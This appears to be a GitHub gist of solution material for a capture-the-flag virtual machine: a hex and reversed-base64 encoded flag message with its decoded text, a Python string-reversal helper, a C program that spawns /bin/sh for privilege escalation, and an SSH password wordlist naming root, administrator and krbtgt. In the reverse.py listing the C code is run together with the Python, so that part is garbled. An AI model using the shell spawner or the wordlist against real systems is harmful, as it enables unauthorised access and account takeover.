636966674243496741434967414349674143496741434967414349674143
4967414349674143496741434967414349674143494b3843496738474976
4243496741434963426d66764143490a765a47496b355759673457616864
575967553259753947493139576567384764674d6e62766c476468785764
30466d636e353262447067434b41794a7434795866393158753043596741
43490a673847646751575a704a486467556d646e6b6b434b4153496e4647
626d7077637068476467636d62704a5864304258596a4269627642535a74
6c476467674764346c326367554761304269630a734233636852585a7442
7964764a486130425362764a6e5a676b5859334647496c5a336274427962
3042434c6c4a585a6f424364704a474968424363314279636e3557616f52
4849346c57620a3042435a6c6c33627135575a67556d6468684749313957
6567554763766847494a42694c7a646d627068476467515859674d486470
3947627768585a6749575a3342435a75466d43306c32620a774258596755
6d596751476231393264675133596c423363684279637068476467343262
67733259684a475a6c566d5a4b495864766c48496b355759673432627052
6e6376424849304647610a6a563263674d57613046576276525864684279
626b427962304243646c4e48496c4a5859674d58545742535a7a56476130
42434c6c5233627542695a507067437551575a304657616a566d630a674d
335a756c4761304243636c56326167384764675148616e563362674d5861
6f524849764e6e437351585a774258647742795a756c3263314279636c52
58596b425864676b4864704a58640a4331474d6b3557595342434c754e6a
5179314749765248497a746d6268684764676b6e6268316b434b34535a73
4233626c42484979396d5a6767325a31396d626c42795970315759756c48
5a0a354279617546476130424362686c32596c42336367456b434b346952
554e45497a6c47613042795a756c47647a564764674933626d4269657535
57613256326167516d62684269576c5258650a685a6e436c68476467516d
62684279636c646d626c78476268683259675532636c6847646777476268
42795a756c47647a394761674933626d427961786b576230427a5a673847
64675533620a68424364755632596c4a48497a6c4761674933626d426962
7a496d637442796230424364686847496c68476467593262674158613042
53516734535a6a6c6d646b4647496c786d59685648620a765a47496e3557
61723932627342535a7946474931395765675957616749585a3052586133
52484979394749444a565367343262675557624b5158614942694c6c4e6d
6268523363704e33630a30564762773132624442434c7539474976646b43
4b34535a6e35575a737857596f4e6d436c6847646751575a305647627731
32626a42535a324647616749336267516e6270684749684269630a7a526d
626c6c6d6347426963313945496d394749784d43496c5232627a6c47636c
42695a7642534e306f7a4e774179623042434d7a6f6a4e7741694f6c7832
59796c3259675547613042535a0a676f77507534694c7534326270523359
6c356d62764e47496c684764674d334a304647615842694c7555544f3545
4449444a6b51676b79516f414361304a33624f42535a6f526c43756c4549
0a6741434967414349674143496741434967414349674143496741434967
414349674143496741434967414349674143496741434967414349674143
49674143496741434967414349674143490a3d6f515a794657623068325a
http://www.unit-conversion.info/texttools/hexadecimal/
gACIgACIgACIgACIgACIgACIgACIgAiCK4iLuU3b5BicvZGIzNXYiBiclRmblZGIhBycnUmclhkC
gACIgACIgACIgACIgACIgACIgACIgACIgACIK8lLt0SLu8FIgACIgACIg4SLsACIgACIgACIgACI
gACIgACIgACIgACIgACIgACIgACIgACIgACIgACIK4CYgACIgACIgcyJt4yXf5CXgBCI8BCIgACI
f91Xf91Xf91Xf91Xf91Xu0zKrsCLgACIgACIgACIgAiCcBCIg4CLgAyXgACIgACIgAyXgACXgACI
90TP90TP90TP90TP90TP94ybv9mLfhCIgACIgACIgACIKwHIgACI8x3X89Fff91Xf91X8x3Xp81X
8BCIgACIgACIgACIgACIgACIn4nfgACIgACIgACIgACIgoAfgACIgwHf9wXP81TP90TP9wHf90TP
gwFIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIK8CIg8GIvByJ+BGIgACIgAyJ+BCI
gcifgBCIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIK8CIg8GIvBCIgACIcBmfvACI
vZGIk5WYg4WahdWYgU2Yu9GI19Weg8GdgMnbvlGdhxWd0Fmcn52bDpgCKAyJt4yXf91Xu0CYgACI
g8GdgQWZpJHdgUmdnkkCKASInFGbmpwcphGdgcmbpJXd0BXYjBibvBSZtlGdggGd4l2cgUGa0Bic
sB3chRXZtBydvJHa0BSbvJnZgkXY3FGIlZ3btByb0BCLlJXZoBCdpJGIhBCc1Bycn5WaoRHI4lWb
0BCZll3bq5WZgUmdhhGI19WegUGcvhGIJBiLzdmbphGdgQXYgMHdp9GbwhXZgIWZ3BCZuFmC0l2b
wBXYgUmYgQGb192dgQ3YlB3chBycphGdg42bgs2YhJGZlVmZKIXdvlHIk5WYg42bpRncvBHI0FGa
jV2cgMWa0FWbvRXdhBybkByb0BCdlNHIlJXYgMXTWBSZzVGa0BCLlR3buBiZPpgCuQWZ0FWajVmc
gM3ZulGa0BCclV2ag8GdgQHanV3bgMXaoRHIvNnCsQXZwBXdwByZul2c1ByclRXYkBXdgkHdpJXd
C1GMk5WYSBCLuNjQy1GIvRHIztmbhhGdgknbh1kCK4SZsB3blBHIy9mZgg2Z19mblByYp1WYulHZ
5ByauFGa0BCbhl2YlB3cgEkCK4iRUNEIzlGa0ByZulGdzVGdgI3bmBieu5Wa2V2agQmbhBiWlRXe
hZnClhGdgQmbhBycldmblxGbhh2YgU2clhGdgwGbhByZulGdz9GagI3bmByaxkWb0BzZg8GdgU3b
hBCduV2YlJHIzlGagI3bmBibzImctByb0BCdhhGIlhGdgY2bgAXa0BSQg4SZjlmdkFGIlxmYhVHb
vZGIn5War92bsBSZyFGI19WegYWagIXZ0RXa3RHIy9GIDJVSg42bgUWbKQXaIBiLlNmbhR3cpN3c
0VGbw12bDBCLu9GIvdkCK4SZn5WZsxWYoNmClhGdgQWZ0VGbw12bjBSZ2FGagI3bgQnbphGIhBic
zRmbllmcGBic19EIm9GIxMCIlR2bzlGclBiZvBSN0ozNwAyb0BCMzojNwAiOlx2Yyl2YgUGa0BSZ
gowPu4iLu42bpR3Yl5mbvNGIlhGdgM3J0FGaXBiLuUTO5EDIDJkQgkyQoACa0J3bOBSZoRlCulEI
gACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACI
=oQZyFWb0h2Z
Seems like Reversed Single line of base64
CkhlcmUncyBhIGZlbmRlciBiYXNzIGZvciB5b3UuLi4KCiAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAsLS4gICAgICAgIF8uLS0tLl8KICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICB8ICBgXC5fXy4tJycgICAgICAgYC4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgXCAgXyAgICAgICAgXyAgLC4gICBcCiAgICAgICAgICAgLCsrKz0uX19fX19fX19fX19fX19f
X18pX3x8X19fX19ffF98X3x8ICAgIHwKICAgICAgICAgIChfLm9vby49PT09PT09PT09PT09PT09
PT09fHw9PT09PT18PXw9fHwgICAgfAogICAgICAgICAgICAgfn4nICAgICAgICAgICAgICAgICB8
ICB+JyAgICAgIGB+JyBvIG8gIC8KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwg
ICAvfmBcICAgICBvIG8gIC8KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBgficg
ICAgYC0uX19fXy4tJyAKCgpDb25ncmF0dWxhdGlvbnMgdG8geW91IG9uY2UgYWdhaW4gYW5kIGZv
ciB0aGUgc2l4dGggdGltZSBvbiBjYXB0dXJpbmcgdGhpcwpmbGFnISAKCkkndmUgdHJpZWQgdG8g
bWl4IHRoaW5ncyB1cCBhIGJpdCBoZXJlLCB0byBtb3ZlIGF3YXkgZnJvbSB0aHJvdyBtZXRhc3Bs
b2l0CmFuZCB3ZWIgZXhwbG9pdHMgYXQgdGhpbmdzLiBJIGhvcGUgeW91IGhhdmUgZW5qb3llZCB0
aGF0IHBvcnRpb24gYW5kIHlvdXIKZmVlZGJhY2sgb24gdGhpcyBhc3BlY3Qgd291bGQgYmUgYXBw
cmVjaWF0ZWQuCgpPZiBub3RlLCB0aGVzZSBWTXMgYXJlIHNldCB0byBkbyBhdXRvbWF0aWMgc2Vj
dXJpdHkgdXBkYXRlcyB1c2luZyBwdXBwZXQsCnNvIHRoaXMgb3VnaHQgdG8ga2VlcCB0aGluZ3Mg
ZHluYW1pYyBlbm91Z2ggZm9yIHBlb3BsZS4KCk1hbnkgdGhhbmtzIHRvIG1yQjNuLCBSYW5kMG1C
eXRlWiBhbmQga2V2aW5ueiBmb3IgdGVzdGluZyB0aGlzIENURi4KCkEgc3BlY2lhbCB0aGFuayB5
b3UgdG8gZzB0bWkxayBmb3IgaG9zdGluZyBhbGwgdGhlc2UgY2hhbGxlbmdlcyBhbmQgdGhlCnZh
bHVhYmxlIGFkdmljZS4gQSB0aXAgb2YgdGhlIGhhdCB0byBtcmIzbiBmb3IgaGlzIHJlY2VudCBh
c3Npc3RhbmNlLiBIaXQKbWUgb24gSVJDIG9yIHR3aXR0ZXIgaWYgeW91IGFyZSBsb29raW5nIGZv
ciBhIGhpbnQgb3IgaGF2ZSBjb21wbGV0ZWQgdGhlCmNoYWxsZW5nZS4KCkdvIG9uLCBDb21wbGV0
ZSB0aGUgY2lyY2xlOiAwNjozMCB0byAwNzo0NSBvZiBlcGlzb2RlICMxIG9mIE91ciBGcmllbmRz
IEluClRoZSBOb3J0aCAoQykgQkJDIDE5OTUuLiBXaGF0J3MgdGhlIGNvbm5lY3Rpb24uLi4uPwog
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
Z2h0bWFyZQo=
base64 -d code.txt
Here's a fender bass for you...
,-. _.---._
| `\.__.-'' `.
\ _ _ ,. \
,+++=._________________)_||______|_|_|| |
(_.ooo.===================||======|=|=|| |
~~' | ~' `~' o o /
\ /~`\ o o /
`~' `-.____.-'
Congratulations to you once again and for the sixth time on capturing this
flag!
I've tried to mix things up a bit here, to move away from throw metasploit
and web exploits at things. I hope you have enjoyed that portion and your
feedback on this aspect would be appreciated.
Of note, these VMs are set to do automatic security updates using puppet,
so this ought to keep things dynamic enough for people.
Many thanks to mrB3n, Rand0mByteZ and kevinnz for testing this CTF.
A special thank you to g0tmi1k for hosting all these challenges and the
valuable advice. A tip of the hat to mrb3n for his recent assistance. Hit
me on IRC or twitter if you are looking for a hint or have completed the
challenge.
Go on, Complete the circle: 06:30 to 07:45 of episode #1 of Our Friends In
The North (C) BBC 1995.. What's the connection....?
Raw
reverse.py
def reverse(string):
start=0
end=len(string)-1
str=[i for i in string]
while(start<end):
tmp=str[start]
str[start]=str[end]
str[end]=tmp
start=start+1
end=end-1
return ''.join(str)
print reverse('gACIgACIgACIgACIgACIgACIgACIgAiCK4iLuU3b5BicvZGIzNXYiBiclRmblZGIhBycnUmclhkC') #include <unistd.h>
int main() {
char *args[2];
args[0] = "/bin/sh";
args[1] = NULL;
execve(args[0], args, NULL);
}
Raw
sandieshaw.c
#include <unistd.h>
int main() {
char *args[2];
args[0] = "/bin/sh";
args[1] = NULL;
execve(args[0], args, NULL);
}
Raw
ssh-profile
Orleans
rising
gambler
mother
tailor
sweetheart
suitcase
satisfied
glasses
around
pleasure
rambling
sister
platform
almost
house
neworleans
therisingsun
poorgirl
bluejeans
jeans
blue
trunk
root
administrator
guest
krbtgt
domains
admins
bin
none
eric
burdon
ericburdon
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment